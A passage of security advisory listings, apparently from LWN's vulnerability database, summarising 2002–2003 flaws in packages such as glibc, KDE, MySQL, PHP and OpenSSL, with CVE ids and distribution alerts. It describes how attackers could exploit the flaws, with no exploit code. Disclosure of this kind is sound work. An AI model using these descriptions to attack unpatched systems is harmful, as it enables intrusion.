Package(s):dvips CVE #(s):CAN-2002-0836
Created:October 16, 2002 Updated:June 10, 2003
Description: The dvips utility uses the system() function improperly when managing fonts. An attacker who can craft the right sort of print job can use this vulnerability to execute commands under the UID used by the print system.
Alerts:
Immunix IMNX-2003-7+-016-01 2003-06-09
OpenPKG OpenPKG-SA-2002.015 2002-12-16
Debian DSA-207-1 2002-12-11
Conectiva CLA-2002:537 2002-10-29
Mandrake MDKSA-2002:071 2002-10-24
Mandrake MDKSA-2002:070 2002-10-23
Gentoo tetex-20021018 2002-10-18
Red Hat RHSA-2002:194-18 2002-10-08


Filename disclosure vulnerability in fam

Package(s):fam CVE #(s):CAN-2002-0875
Created:August 19, 2002 Updated:January 5, 2005
Description: "fam" (file alteration monitor) watches files and directories for changes and lets interested applications know when something happens. This package has a flaw in its group handling that blocks some legitimate operations while, at the same time, exposing the names of files that should otherwise be invisible.
Alerts:
Red Hat RHSA-2005:005-01 2005-01-05
Debian DSA-154-1 2002-08-15


fetchmail: buffer overflow

Package(s):fetchmail CVE #(s):CAN-2002-1365
Created:December 17, 2002 Updated:October 20, 2003
Description: Versions of fetchmail prior to 6.2.0 have (yet another) buffer overflow vulnerability which can be exploited remotely via a suitably crafted message. See this advisory for details.
Alerts:
Immunix IMNX-2003-7+-023-01 2003-10-17
Mandrake MDKSA-2003:011 2003-01-27
EnGarde ESA-20030127-002 2003-01-27
SCO Group CSSA-2003-001.0 2003-01-09
SuSE SuSE-SA:2003:001 2003-01-02
Debian DSA-216-1 2002-12-24
Red Hat RHSA-2002:293-09 2002-12-17
Conectiva CLA-2002:554 2002-12-16


GNU fileutils race condition

Package(s):fileutils ucdsnmp CVE #(s):CAN-2002-0435
Created:May 20, 2002 Updated:May 16, 2003
Description: A race condition in rm may cause the root user to delete the whole filesystem. The problem exists in the version of rm in fileutils 4.1 stable and 4.1.6 development version. A patch is available. (First LWN report: May 2).
Alerts:
Immunix IMNX-2003-7+-010-01 2003-05-16
Red Hat RHSA-2003:015-05 2003-02-12
Trustix 2002-0052 2002-06-06
SuSE SuSE-SA:2002:012 2002-04-08
Mandrake MDKSA-2002:031 2002-05-16
SCO Group CSSA-2002-018.1 2002-05-13


Potential remote root exploit in glibc

Package(s):glibc CVE #(s):CAN-2002-0391
Created:August 14, 2002 Updated:June 29, 2003
Description: Felix von Leitner discovered an integer overflow in the xdr_array() function of code derived from the SunRPC library, which is used in glibc. This bug could be exploited to gain unauthorized root access to software linking to glibc.

Updating as soon as practical is a good idea.

Because SunRPC-derived XDR libraries are used by a variety of vendors in a variety of applications, this defect may lead to a number of differing security problems. Exploiting this vulnerability will lead to denial of service, execution of arbitrary code, or the disclosure of sensitive information.

CERT/CC Vulnerability Note VU#192995 Integer overflow in xdr_array() function when deserializing the XDR stream

Alerts:
Debian DSA-333-1 2003-06-27
Conectiva CLA-2002:535 2002-10-29
Trustix 2002-0070 2002-10-17
EnGarde ESA-20021003-021 2002-10-03
Gentoo glibc-20020927 2002-09-27
Gentoo dietlibc-20020927 2002-09-27
Debian DSA-149-2 2002-09-26
Mandrake MDKSA-2002:061 2002-09-23
Gentoo glibc-20020905 2002-09-05
SuSE SuSE-SA:2002:031 2002-08-30
Trustix 2002-0067 2002-08-13
Eridani ERISA-2002:036 2002-08-13
Red Hat RHSA-2002:166-07 2002-08-12
Debian DSA-149-1 2002-08-13

Comments (none posted)

glibc: DNS stub resolvers contain buffer overflow vulnerability

Package(s):glibc CVE #(s):CAN-2002-1146
Created:November 7, 2002 Updated:February 5, 2004
Description: DNS stub resolvers from multiple vendors contain a buffer overflow vulnerability. The impact of this vulnerability appears to be limited to denial of service. (See CERT Vulnerability Note VU#738331)

The BIND 4 and BIND 8.2.x stub resolver libraries, and other libraries such as glibc 2.2.5 and earlier, libc, and libresolv, use the maximum buffer size instead of the actual size when processing a DNS response, which causes the stub resolvers to read past the actual boundary ("read buffer overflow"), allowing remote attackers to cause a denial of service (crash).

Alerts:
Mandrake MDKSA-2004:009 2004-02-04
Red Hat RHSA-2002:197-09 2002-11-06
Red Hat RHSA-2002:197-06 2002-10-03

Comments (none posted)

hypermail - buffer overflows

Package(s):hypermail CVE #(s):CAN-2003-0057
Created:February 11, 2003 Updated:February 27, 2003
Description: Ulf Harnhammar discovered two problems in hypermail, a program to create HTML archives of mailing lists.

An attacker could craft a long filename for an attachment that would overflow two buffers when a certain option for interactive use was given, opening the possibility to inject arbitrary code. This code would then be executed under the user id hypermail runs as, mostly as a local user. Automatic and silent use of hypermail does not seem to be affected.

The CGI program mail, which is not installed by the Debian package, does a reverse look-up of the user's IP number and copies the resulting hostname into a fixed-size buffer. A specially crafted DNS reply could overflow this buffer, opening the program to an exploit.

Alerts:
SuSE SuSE-SA:2003:0012 2003-02-27
Debian DSA-248-1 2003-01-31

Comments (none posted)

IM: creates temporary files insecurely

Package(s):im CVE #(s):CAN-2002-1395
Created:December 3, 2002 Updated:March 6, 2003
Description: Tatsuya Kinoshita discovered that IM, which contains interface commands and Perl libraries for E-mail and NetNews, creates temporary files insecurely.
  1. The impwagent program creates a temporary directory in an insecure manner in /tmp, using predictable directory names without checking the return code of mkdir, so a local user can take control of the temporary directory belonging to another user.

  2. The immknmz program creates a temporary file in an insecure manner in /tmp using a predictable filename, so an attacker with local access can easily create and overwrite files as another user.
Alerts:
Red Hat RHSA-2003:039-06 2003-03-06
Debian DSA-202-2 2002-12-06
Debian DSA-202-1 2002-12-03

Comments (none posted)

IMP - SQL injection vulnerability

Package(s):imp CVE #(s):CAN-2003-0025
Created:January 15, 2003 Updated:July 8, 2003
Description: The IMP IMAP server, versions 2.2.8 and prior, is vulnerable to SQL injection; see this advisory for details. Version 3.x is not vulnerable to this problem.
Alerts:
Conectiva CLA-2003:690 2003-07-08
SuSE SuSE-SA:2003:0008 2003-02-18
Debian DSA-229-2 2003-01-15

Comments (1 posted)

KDE - command parameter quoting problems

Package(s):kde CVE #(s):CAN-2002-1393
Created:December 23, 2002 Updated:February 21, 2003
Description: In some instances, KDE (versions 2 and 3) fails to properly quote parameters of instructions passed to a command shell for execution.

These parameters may incorporate data such as URLs, filenames and e-mail addresses, and this data may be provided remotely to a victim in an e-mail, a webpage or files on a network filesystem or other untrusted source.

By carefully crafting such data an attacker might be able to execute arbitrary commands on a vulnerable system using the victim's account and privileges.

See this announcement for more details.

Alerts:
Conectiva CLA-2003:569 2003-02-20
Debian DSA-243-1 2003-01-24
Debian DSA-242-1 2003-01-24
Debian DSA-241-1 2003-01-24
Debian DSA-239-1 2003-01-23
Debian DSA-240-1 2003-01-23
Debian DSA-237-1 2003-01-22
Debian DSA-238-1 2003-01-23
Debian DSA-236-1 2003-01-22
Debian DSA-235-1 2003-01-22
Debian DSA-234-1 2003-01-22
Gentoo 200301-11 2003-01-18
Mandrake MDKSA-2003:004-1 2003-01-17
Mandrake MDKSA-2003:004 2003-01-13
Gentoo 200212-9 2002-12-22

Comments (none posted)

kdelibs: Vulnerabilities in KIO subsystem support

Package(s):kdelibs CVE #(s):CAN-2002-1281 CAN-2002-1282
Created:November 22, 2002 Updated:March 14, 2003
Description: Vulnerabilities were discovered in the KIO subsystem support for various network protocols. The implementation of the rlogin protocol affects all KDE versions from 2.1 up to 3.0.4, while the flawed implementation of the telnet protocol only affects KDE 2.x. They allow a carefully crafted URL in an HTML page, HTML email, or other KIO-enabled application to execute arbitrary commands as the victim with the victim's privileges. The KDE team provided a patch for KDE3 which has been applied in these packages. No patch was provided for KDE2; however, the KDE team recommends disabling both the rlogin and telnet KIO protocols. This can be accomplished by removing, as root, the following files:
/usr/share/services/telnet.protocol and
/usr/share/services/rlogin.protocol.
If either file also exists in a user's ~/.kde/share/services directory, it should likewise be removed. See also: http://www.kde.org/info/security/advisory-20021111-1.txt
Alerts:
SCO Group CSSA-2003-012.0 2003-03-14
Debian DSA-204-1 2002-12-05
Red Hat RHSA-2002:220-40 2002-12-04
Mandrake MDKSA-2002:079 2002-11-21

Comments (none posted)

kernel-utils: setuid vulnerability

Package(s):kernel-utils CVE #(s):CAN-2003-0019
Created:February 7, 2003 Updated:January 21, 2005
Description: The kernel-utils package contains several utilities that can be used to control the kernel or machine hardware. In Red Hat Linux 8.0 this package contains user mode linux (UML) utilities.

The uml_net utility in kernel-utils packages with Red Hat Linux 8.0 was incorrectly shipped setuid root. This could allow local users to control certain network interfaces, add and remove arp entries and routes, and put interfaces in and out of promiscuous mode.

All users of the kernel-utils package should update to these packages that contain a version of uml_net that is not setuid root.

Alternatively, as a work-around to this vulnerability issue the following command as root:

chmod -s /usr/bin/uml_net

Alerts:
Red Hat RHSA-2003:056-08 2003-02-07

Comments (none posted)

krb5 - vulnerability in Kerberos ftp client

Package(s):krb5 ftp netkit CVE #(s):CAN-2003-0041
Created:January 31, 2003 Updated:February 21, 2003
Description: Kerberos is a network authentication system.

A problem has been found in the Kerberos ftp client. When retrieving a file with a filename beginning with a pipe character, the ftp client will pass the filename to the command shell in a system() call. This could allow a malicious ftp server to write to files outside of the current directory or execute commands as the user running the ftp client.

The Kerberos ftp client runs as the default ftp client when the Kerberos package krb5-workstation is installed on a Red Hat Linux distribution.

Alerts:
Mandrake MDKSA-2003:021 2003-02-21
Red Hat RHSA-2003:020-10 2003-01-31

Comments (none posted)

libmcrypt: buffer overflows and memory exhaustion

Package(s):libmcrypt CVE #(s):CAN-2003-0031 CAN-2003-0032
Created:January 6, 2003 Updated:February 27, 2003
Description: libmcrypt versions prior to 2.5.5 contain a number of buffer overflow vulnerabilities that stem from improper or lacking input validation. By passing a longer than expected input to a number of functions (multiple functions are affected) the user can successfully make libmcrypt crash.

Another vulnerability is due to the way libmcrypt loads algorithms via libtool. When algorithms are loaded dynamically, a small amount (a few kilobytes) of memory is leaked each time an algorithm is loaded. In a persistent environment (web server) this could lead to a memory exhaustion attack that exhausts all available memory by launching repeated requests at an application utilizing the mcrypt library.

Alerts:
SuSE SuSE-SA:2003:0010 2003-02-26
Conectiva CLA-2003:567 2003-02-05
Debian DSA-228-1 2003-01-14
Gentoo 200301-4 2003-01-05

Comments (none posted)

libpng, libpng3: buffer overflow

Package(s):libpng, libpng3 CVE #(s):CAN-2002-1363
Created:December 19, 2002 Updated:July 14, 2004
Description: Glenn Randers-Pehrson discovered a problem in connection with 16-bit samples from libpng, an interface for reading and writing PNG (Portable Network Graphics) format files. The starting offsets for the loops are calculated incorrectly which causes a buffer overrun beyond the beginning of the row buffer.
Alerts:
Gentoo 200407-06 2004-07-08
OpenPKG OpenPKG-SA-2004.030 2004-07-06
Mandrake MDKSA-2004:063 2004-06-29
Whitebox WBSA-2004:249-01 2004-06-21
Fedora FEDORA-2004-176 2004-06-18
Fedora FEDORA-2004-174 2004-06-18
Fedora FEDORA-2004-175 2004-06-18
Fedora FEDORA-2004-173 2004-06-18
Red Hat RHSA-2004:249-01 2004-06-18
Conectiva CLA-2003:564 2003-01-23
Mandrake MDKSA-2003:008 2003-01-20
OpenPKG OpenPKG-SA-2003.001 2003-01-15
Yellow Dog YDU-20030114-2 2002-01-14
SuSE SuSE-SA:2003:0004 2003-01-14
Red Hat RHSA-2003:006-06 2003-01-09
Debian DSA-213-1 2002-12-19

Comments (none posted)

lynx: CRLF injection vulnerability

Package(s):lynx CVE #(s):CAN-2002-1405
Created:November 19, 2002 Updated:September 30, 2003
Description: If lynx is given a URL with some special characters on the command line, it will include faked headers in the HTTP query. This feature can be used to force scripts (that use Lynx for downloading files) to access the wrong site on a web server with multiple virtual hosts.

CAN-2002-1405

Alerts:
Conectiva CLA-2003:720 2003-08-11
Mandrake MDKSA-2003:023 2003-02-24
OpenPKG OpenPKG-SA-2003.011 2003-02-18
Red Hat RHSA-2003:029-06 2003-02-12
Trustix 2002-0085 2002-12-19
Debian DSA-210-1 2002-12-13
SCO Group CSSA-2002-049.0 2002-11-18

Comments (none posted)

mailman: mailman 2.1 cross site scripting vulnerabilities

Package(s):mailman CVE #(s):
Created:February 17, 2003 Updated:February 19, 2003
Description: The email variable and the default error page in mailman 2.1 contain cross site scripting vulnerabilities.

Read the full advisory for the details.

Alerts:
Gentoo 200302-05 2003-02-17

Comments (none posted)

perl-MailTools: remote command execution

Package(s):MailTools CVE #(s):CAN-2002-1271
Created:November 5, 2002 Updated:September 19, 2003
Description: The SuSE Security Team reviewed critical Perl modules, including the Mail::Mailer package. This package contains a security hole which allows remote attackers to execute arbitrary commands in certain circumstances. This is due to the usage of mailx as default mailer which allows commands to be embedded in the mail body.

Note that mail processing programs which use this package can be affected by this vulnerability; in particular, SpamAssassin is vulnerable if you use the -r or -w flags.

Alerts:
Debian DSA-386-1 2003-09-18
Gentoo 200302-01 2003-02-02
Mandrake MDKSA-2002:076 2002-11-07
Gentoo 200211-001 2002-11-06
SuSE SuSE-SA:2002:041 2002-11-05

Comments (none posted)

micq: Denial of service

Package(s):micq CVE #(s):
Created:December 13, 2002 Updated:April 24, 2003
Description: Rüdiger Kuhlmann, upstream developer of mICQ, a text based ICQ client, discovered a problem in mICQ. Receiving certain ICQ message types that do not contain the required 0xFE separator causes all versions to crash.
Alerts:
Red Hat RHSA-2003:118-01 2003-04-24
Debian DSA-211-1 2002-12-13

Comments (none posted)

mod_dav: Apache mod_dav module format string vulnerability

Package(s):mod_dav CVE #(s):
Created:February 17, 2003 Updated:February 19, 2003
Description: The Apache mod_dav module contains a format string vulnerability in the "ap_log_rerror()" function.
Alerts: (No alerts in the database for this vulnerability)

Comments (1 posted)

mod_php - buffer overflow

Package(s):mod_php php CVE #(s):CAN-2002-1396
Created:January 13, 2003 Updated:February 20, 2003
Description: The wordwrap() function on user-supplied input may allow a specially-crafted input to overflow the allocated buffer and overwrite the heap. There are no known exploits, but an exploit is theoretically possible.

Read the full advisory at http://marc.theaimsgroup.com/?l=bugtraq&m=104102689503192&w=2

Alerts:
Mandrake MDKSA-2003:019 2003-02-19
EnGarde ESA-20030219-003 2003-02-19
Red Hat RHSA-2003:017-06 2003-02-04
OpenPKG OpenPKG-SA-2003.005 2003-01-22
Gentoo 200301-8 2003-01-13

Comments (none posted)

MySQL - double free vulnerability

Package(s):mysql CVE #(s):CAN-2003-0073
Created:January 29, 2003 Updated:February 21, 2003
Description: MySQL 3.23.55 fixes a double-free vulnerability which allows a hostile client to crash the server process. Logging into the server is necessary before this vulnerability can be exploited.
Alerts:
Trustix 2003-0003 2003-02-20
EnGarde ESA-20030220-004 2003-02-20
Mandrake MDKSA-2003:013 2003-02-03
OpenPKG OpenPKG-SA-2003.008 2003-01-29

Comments (none posted)

MySQL: multiple vulnerabilities

Package(s):mysql CVE #(s):
Created:December 13, 2002 Updated:April 10, 2003
Description: The MySQL database server has several buffer overflow and integer bounds checking vulnerabilities which can lead to denial of service attacks and, possibly, remote code execution. See this e-matters advisory for details. Version 3.23.54 fixes the problems.
Alerts:
Immunix IMNX-2003-7+-008-01 2003-04-08
EnGarde ESA-20030127-001 2003-01-27
Red Hat RHSA-2002:288-22 2003-01-15
SuSE SuSE-SA:2003:003 2003-01-02
Trustix 2002-0086 2002-12-19
Mandrake MDKSA-2002:087 2002-12-18
Debian DSA-212-1 2002-12-17
Conectiva CLA-2002:555 2002-12-17
OpenPKG OpenPKG-SA-2002.013 2002-12-16
Gentoo 200212-2 2002-12-15
EnGarde ESA-20021213-033 2002-12-13

Comments (none posted)

nethack: buffer overflow

Package(s):nethack, slashem, falconseye CVE #(s):CAN-2003-0358 CAN-2003-0359
Created:February 18, 2003 Updated:July 15, 2003
Description: Overflowing a buffer in nethack may lead to privilege escalation to games uid.

Read the full advisory for the details.

Note that falconseye does not contain the file permission error CAN-2003-0359 which affected some other nethack packages.

Alerts:
Debian DSA-350-1 2003-07-15
Debian DSA-316-3 2003-06-17
Debian DSA-316-2 2003-06-11
Debian DSA-316-1 2003-06-11
Gentoo 200302-08 2003-02-18

Comments (none posted)

net-snmp: denial of service vulnerability

Package(s):net-snmp CVE #(s):CAN-2002-1170
Created:December 17, 2002 Updated:November 7, 2003
Description: The SNMP daemon included in the Net-SNMP package versions 5.0.1 through 5.0.4 can be caused to crash if it is sent a specially crafted packet.
Alerts:
Conectiva CLA-2003:778 2003-11-07
Red Hat RHSA-2002:228-11 2002-12-17

Comments (none posted)

OpenLDAP2: remote command execution

Package(s):OpenLDAP2 CVE #(s):CAN-2002-1378 CAN-2002-1379
Created:December 6, 2002 Updated:February 21, 2003
Description: OpenLDAP is the Open Source implementation of the Lightweight Directory Access Protocol (LDAP) and is used in network environments for distributing certain information such as X.509 certificates or login information.

The SuSE Security Team reviewed critical parts of that package and found several buffer overflows and other bugs remote attackers could exploit to gain access on systems running vulnerable LDAP servers. In addition to these bugs, various locally exploitable bugs within the OpenLDAP2 libraries (openldap2-devel package) have been fixed.

Since there is no workaround possible except shutting down the LDAP server, an update is strongly recommended.

Alerts:
Trustix 2003-0002 2003-02-20
Red Hat RHSA-2003:040-07 2003-02-05
Mandrake MDKSA-2003:006 2003-01-14
Debian DSA-227-1 2003-01-13
Gentoo 200212-12 2002-12-28
Conectiva CLA-2002:556 2002-12-19
SuSE SuSE-SA:2002:047 2002-12-06

Comments (1 posted)

OpenSSL: plaintext exposure vulnerability

Package(s):openssl CVE #(s):CAN-2003-0078
Created:February 19, 2003 Updated:March 6, 2003
Description: A vulnerability has been found in OpenSSL that, given the right conditions, could lead to the exposure of transactions in plain text. This problem looks difficult to exploit (it requires a man-in-the-middle attack, among other things), but one can't be too sure, so the OpenSSL project has released versions 0.9.7a (with the fix and some new features) and 0.9.6i (with fixes only). See the announcement for details.
Alerts:
Red Hat RHSA-2003:062-11 2003-03-06
SuSE SuSE-SA:2003:011 2003-02-26
Conectiva CLA-2003:570 2003-02-24
Debian DSA-253-1 2003-02-24
Mandrake MDKSA-2003:020 2003-02-21
Trustix 2003-0005 2003-02-20
Gentoo 200302-10 2003-02-20
EnGarde ESA-20030220-005 2003-02-20
OpenPKG OpenPKG-SA-2003.013 2003-02-19

Comments (none posted)

pam_xauth: root exploit

Package(s):pam_xauth CVE #(s):CAN-2002-1160
Created:February 13, 2003 Updated:July 10, 2003
Description: The pam_xauth module is used to forward xauth information from user to user in applications such as 'su'.

Andreas Beck discovered that versions of pam_xauth supplied with Red Hat Linux since version 7.1 would forward authorization information from the root account to unprivileged users. This could be used by a local attacker to gain access to an administrator's X session. In order to exploit this vulnerability, the attacker would have to get the administrator, as root, to use su to the account belonging to the attacker.

Alerts:
Conectiva CLA-2003:693 2003-07-10
Mandrake MDKSA-2003:017-1 2003-04-28
Red Hat RHSA-2003:035-10 2003-02-12

Comments (none posted)

PHP: vulnerability in mail function

Package(s):php CVE #(s):CAN-2002-0985 CAN-2002-0986
Created:November 13, 2002 Updated:September 30, 2003
Description: Two vulnerabilities exist in the mail() PHP function. The first one allows the execution of any program/script, bypassing the safe_mode restriction; the second one may give an open-relay script if the mail() function is not carefully used in PHP scripts. See this Bugtraq report for more details. Note that this is a different vulnerability than the previous PHP mail() problem, which affected versions through 4.1.0.

CAN-2002-0985
CAN-2002-0986

Alerts:
SCO Group CSSA-2003-008.0 2003-03-04
Gentoo 200211-005 2002-11-20
EnGarde ESA-20021122-031 2002-11-22
Conectiva CLA-2002:545 2002-11-13
Red Hat RHSA-2002:213-06 2002-11-11

Comments (none posted)

php: arbitrary file access and code execution

Package(s):php, mod_php CVE #(s):
Created:February 18, 2003 Updated:February 19, 2003
Description: Kosmas Skiadopoulos discovered a serious security vulnerability [0] in the CGI SAPI of PHP version 4.3.0. PHP [1] contains code for preventing direct access to the CGI binary with configure option "--enable-force-cgi-redirect" and php.ini option "cgi.force_redirect". In PHP 4.3.0 there is a bug which renders these options useless. Please note that this bug does NOT affect any of the other SAPI modules such as the Apache or ISAPI modules.

Anyone with access to websites hosted on a web server which employs the CGI module may exploit this vulnerability to gain access to any file readable by the user under which the webserver runs. A remote attacker could also trick PHP into executing arbitrary PHP code if the attacker is able to inject the code into files accessible by the CGI. This could be, for example, the web server access logs.

References:
[0] http://www.php.net/release_4_3_1.php
[1] http://www.php.net/

Alerts:
Gentoo 200302-09 2003-02-19
OpenPKG OpenPKG-SA-2003.010 2003-02-18

Comments (none posted)

PostgreSQL - more buffer overflows

Package(s):postgresql CVE #(s):
Created:February 12, 2003 Updated:November 7, 2003
Description: A new set of buffer overflows has been discovered in PostgreSQL 7.2.2; they affect the circle_poly(), path_encode(), and path_addr() functions. Exploiting these overflows requires that the attacker first obtain a connection to the PostgreSQL server.
Alerts:
Debian DSA-397-1 2003-11-07
Immunix IMNX-2003-7+-005-01 2003-04-08
Trustix 2003-0004 2003-02-20
Mandrake MDKSA-2002:062-1 2003-02-11

Comments (1 posted)

Local arbitrary code execution vulnerability in Python

Package(s):python CVE #(s):CAN-2002-1119
Created:August 28, 2002 Updated:September 30, 2003
Description: Zack Weinberg discovered that os._execvpe from os.py uses a predictable name which could lead to execution of arbitrary code. According to the Debian advisory, the problem was present in Python versions 1.5, 2.1 and 2.2.

CAN-2002-1119

Alerts:
Red Hat RHSA-2002:202-33 2003-02-12
OpenPKG OpenPKG-SA-2003.006 2003-01-23
Red Hat RHSA-2002:202-25 2003-01-21
Mandrake MDKSA-2002:082-1 2002-12-09
Mandrake MDKSA-2002:082 2002-11-25
SCO Group CSSA-2002-045.0 2002-11-14
Trustix 2002-0073 2002-10-17
Gentoo python-20021003 2002-10-03
Conectiva CLA-2002:527 2002-10-01
Debian DSA-159-2 2002-09-09
Debian DSA-159-1 2002-08-28

Comments (none posted)

Multiple-use vulnerability in Safe.pm

Package(s):Safe.pm CVE #(s):CAN-2002-1323
Created:October 9, 2002 Updated:February 20, 2004
Description: usePerl has a description